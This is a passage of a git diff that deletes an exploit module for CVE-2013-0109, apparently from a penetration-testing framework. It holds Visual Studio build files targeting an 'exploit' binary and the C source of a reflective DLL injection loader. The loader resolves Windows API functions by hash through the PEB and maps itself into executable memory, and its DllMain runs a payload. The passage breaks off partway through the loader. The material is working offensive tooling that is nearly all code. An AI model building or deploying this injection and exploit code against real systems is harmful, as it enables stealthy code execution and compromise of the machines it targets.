-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup>
-    <_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
-    <IntDir>$(Configuration)\</IntDir>
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <IntDir>$(Platform)\$(Configuration)\</IntDir>
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
-    <IntDir>$(Configuration)\</IntDir>
-    <LinkIncremental>false</LinkIncremental>
-    <TargetName>exploit</TargetName>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <IntDir>$(Platform)\$(Configuration)\</IntDir>
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <MinimalRebuild>true</MinimalRebuild>
-      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
-      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
-      <PrecompiledHeader />
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Windows</SubSystem>
-      <TargetMachine>MachineX86</TargetMachine>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
-    <ClCompile>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <MinimalRebuild>true</MinimalRebuild>
-      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
-      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Windows</SubSystem>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <Midl>
-      <TargetEnvironment>X64</TargetEnvironment>
-    </Midl>
-    <ClCompile>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <MinimalRebuild>true</MinimalRebuild>
-      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
-      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
-      <PrecompiledHeader />
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Windows</SubSystem>
-      <TargetMachine>MachineX64</TargetMachine>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <Optimization>MaxSpeed</Optimization>
-      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <PrecompiledHeader />
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Windows</SubSystem>
-      <OptimizeReferences>true</OptimizeReferences>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <TargetMachine>MachineX86</TargetMachine>
-    </Link>
-    <PostBuildEvent>
-      <Command>
-      </Command>
-    </PostBuildEvent>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
-    <ClCompile>
-      <Optimization>MinSpace</Optimization>
-      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-      <BufferSecurityCheck>true</BufferSecurityCheck>
-      <CompileAs>Default</CompileAs>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Windows</SubSystem>
-      <OptimizeReferences>true</OptimizeReferences>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OutputFile>$(OutDir)$(ProjectName).arm.dll</OutputFile>
-    </Link>
-    <PostBuildEvent>
-      <Command>copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\</Command>
-    </PostBuildEvent>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <Midl>
-      <TargetEnvironment>X64</TargetEnvironment>
-    </Midl>
-    <ClCompile>
-      <Optimization>MaxSpeed</Optimization>
-      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
-      <WholeProgramOptimization>false</WholeProgramOptimization>
-      <PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <PrecompiledHeader />
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-      <CompileAs>CompileAsCpp</CompileAs>
-    </ClCompile>
-    <Link>
-      <OutputFile>$(OutDir)$(ProjectName).x64.dll</OutputFile>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Windows</SubSystem>
-      <OptimizeReferences>true</OptimizeReferences>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <TargetMachine>MachineX64</TargetMachine>
-    </Link>
-    <PostBuildEvent>
-      <Command>copy $(OutDir)$(ProjectName).x64.dll ..\bin\</Command>
-    </PostBuildEvent>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="src\exploit.cpp" />
-    <ClCompile Include="src\ReflectiveDll.c" />
-    <ClCompile Include="src\ReflectiveLoader.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="src\ReflectiveDLLInjection.h" />
-    <ClInclude Include="src\ReflectiveLoader.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters
deleted file mode 100644
index 9bb86dca22..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters
+++ /dev/null
@@ -1,32 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="src\ReflectiveDll.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="src\ReflectiveLoader.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="src\exploit.cpp">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="src\ReflectiveDLLInjection.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="src\ReflectiveLoader.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user
deleted file mode 100644
index 695b5c78b9..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user
+++ /dev/null
@@ -1,3 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h
deleted file mode 100644
index 5738497f5b..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h
+++ /dev/null
@@ -1,51 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include <windows.h>
-
-// we declare some common stuff in here...
-
-#define DLL_QUERY_HMODULE		6
-
-#define DEREF( name )*(UINT_PTR *)(name)
-#define DEREF_64( name )*(DWORD64 *)(name)
-#define DEREF_32( name )*(DWORD *)(name)
-#define DEREF_16( name )*(WORD *)(name)
-#define DEREF_8( name )*(BYTE *)(name)
-
-typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
-
-#define DLLEXPORT   __declspec( dllexport ) 
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c
deleted file mode 100644
index cf73a8a853..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c
+++ /dev/null
@@ -1,33 +0,0 @@
-//===============================================================================================//
-// This is a stub for the actuall functionality of the DLL.
-//===============================================================================================//
-#include "ReflectiveLoader.h"
-
-// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
-// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own 
-// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
-
-// You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c)
-extern HINSTANCE hAppInstance;
-//===============================================================================================//
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
-{
-    BOOL bReturnValue = TRUE;
-	switch( dwReason ) 
-    { 
-		case DLL_QUERY_HMODULE:
-			if( lpReserved != NULL )
-				*(HMODULE *)lpReserved = hAppInstance;
-			break;
-		case DLL_PROCESS_ATTACH:
-			hAppInstance = hinstDLL;
-			run();
-			ExitProcess(0);
-			break;
-		case DLL_PROCESS_DETACH:
-		case DLL_THREAD_ATTACH:
-		case DLL_THREAD_DETACH:
-            break;
-    }
-	return bReturnValue;
-}
diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c
deleted file mode 100644
index 594c0b8066..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c
+++ /dev/null
@@ -1,496 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "ReflectiveLoader.h"
-//===============================================================================================//
-// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
-HINSTANCE hAppInstance = NULL;
-//===============================================================================================//
-#pragma intrinsic( _ReturnAddress )
-// This function can not be inlined by the compiler or we will not get the address we expect. Ideally 
-// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of 
-// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics 
-// available (and no inline asm available under x64).
-__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
-//===============================================================================================//
-
-// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,  
-//         otherwise the DllMain at the end of this file will be used.
-
-// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
-//         otherwise it is assumed you are calling the ReflectiveLoader via a stub.
-
-// This is our position independent reflective DLL loader/injector
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
-#else
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
-#endif
-{
-	// the functions we need
-	LOADLIBRARYA pLoadLibraryA     = NULL;
-	GETPROCADDRESS pGetProcAddress = NULL;
-	VIRTUALALLOC pVirtualAlloc     = NULL;
-	NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
-
-	USHORT usCounter;
-
-	// the initial location of this image in memory
-	ULONG_PTR uiLibraryAddress;
-	// the kernels base address and later this images newly loaded base address
-	ULONG_PTR uiBaseAddress;
-
-	// variables for processing the kernels export table
-	ULONG_PTR uiAddressArray;
-	ULONG_PTR uiNameArray;
-	ULONG_PTR uiExportDir;
-	ULONG_PTR uiNameOrdinals;
-	DWORD dwHashValue;
-
-	// variables for loading this image
-	ULONG_PTR uiHeaderValue;
-	ULONG_PTR uiValueA;
-	ULONG_PTR uiValueB;
-	ULONG_PTR uiValueC;
-	ULONG_PTR uiValueD;
-	ULONG_PTR uiValueE;
-
-	// STEP 0: calculate our images current base address
-
-	// we will start searching backwards from our callers return address.
-	uiLibraryAddress = caller();
-
-	// loop through memory backwards searching for our images base address
-	// we dont need SEH style search as we shouldnt generate any access violations with this
-	while( TRUE )
-	{
-		if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
-		{
-			uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-			// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
-			// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
-			if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
-			{
-				uiHeaderValue += uiLibraryAddress;
-				// break if we have found a valid MZ/PE header
-				if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
-					break;
-			}
-		}
-		uiLibraryAddress--;
-	}
-
-	// STEP 1: process the kernels exports for the functions our loader needs...
-
-	// get the Process Enviroment Block
-#ifdef WIN_X64
-	uiBaseAddress = __readgsqword( 0x60 );
-#else
-#ifdef WIN_X86
-	uiBaseAddress = __readfsdword( 0x30 );
-#else WIN_ARM
-	uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
-#endif
-#endif
-
-	// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
-	uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
-
-	// get the first entry of the InMemoryOrder module list
-	uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
-	while( uiValueA )
-	{
-		// get pointer to current modules name (unicode string)
-		uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
-		// set bCounter to the length for the loop
-		usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
-		// clear uiValueC which will store the hash of the module name
-		uiValueC = 0;
-
-		// compute the hash of the module name...
-		do
-		{
-			uiValueC = ror( (DWORD)uiValueC );
-			// normalize to uppercase if the madule name is in lowercase
-			if( *((BYTE *)uiValueB) >= 'a' )
-				uiValueC += *((BYTE *)uiValueB) - 0x20;
-			else
-				uiValueC += *((BYTE *)uiValueB);
-			uiValueB++;
-		} while( --usCounter );
-
-		// compare the hash with that of kernel32.dll
-		if( (DWORD)uiValueC == KERNEL32DLL_HASH )
-		{
-			// get this modules base address
-			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
-
-			// get the VA of the modules NT Header
-			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
-			// uiNameArray = the address of the modules export directory entry
-			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-			// get the VA of the export directory
-			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
-			// get the VA for the array of name pointers
-			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
-			
-			// get the VA for the array of name ordinals
-			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
-
-			usCounter = 3;
-
-			// loop while we still have imports to find
-			while( usCounter > 0 )
-			{
-				// compute the hash values for this function name
-				dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
-				
-				// if we have found a function we want we get its virtual address
-				if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
-				{
-					// get the VA for the array of addresses
-					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
-					// use this functions name ordinal as an index into the array of name pointers
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
-					// store this functions VA
-					if( dwHashValue == LOADLIBRARYA_HASH )
-						pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-					else if( dwHashValue == GETPROCADDRESS_HASH )
-						pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-					else if( dwHashValue == VIRTUALALLOC_HASH )
-						pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-			
-					// decrement our counter
-					usCounter--;
-				}
-
-				// get the next exported function name
-				uiNameArray += sizeof(DWORD);
-
-				// get the next exported function name ordinal
-				uiNameOrdinals += sizeof(WORD);
-			}
-		}
-		else if( (DWORD)uiValueC == NTDLLDLL_HASH )
-		{
-			// get this modules base address
-			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
-
-			// get the VA of the modules NT Header
-			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
-			// uiNameArray = the address of the modules export directory entry
-			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-			// get the VA of the export directory
-			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
-			// get the VA for the array of name pointers
-			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
-			
-			// get the VA for the array of name ordinals
-			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
-
-			usCounter = 1;
-
-			// loop while we still have imports to find
-			while( usCounter > 0 )
-			{
-				// compute the hash values for this function name
-				dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
-				
-				// if we have found a function we want we get its virtual address
-				if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
-				{
-					// get the VA for the array of addresses
-					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
-					// use this functions name ordinal as an index into the array of name pointers
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
-					// store this functions VA
-					if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
-						pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-
-					// decrement our counter
-					usCounter--;
-				}
-
-				// get the next exported function name
-				uiNameArray += sizeof(DWORD);
-
-				// get the next exported function name ordinal
-				uiNameOrdinals += sizeof(WORD);
-			}
-		}
-
-		// we stop searching when we have found everything we need.
-		if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache )
-			break;
-
-		// get the next entry
-		uiValueA = DEREF( uiValueA );
-	}
-
-	// STEP 2: load our image into a new permanent location in memory...
-
-	// get the VA of the NT Header for the PE to be loaded
-	uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-
-	// allocate all the memory for the DLL to be loaded into. we can load at any address because we will  
-	// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
-	uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
-
-	// we must now copy over the headers
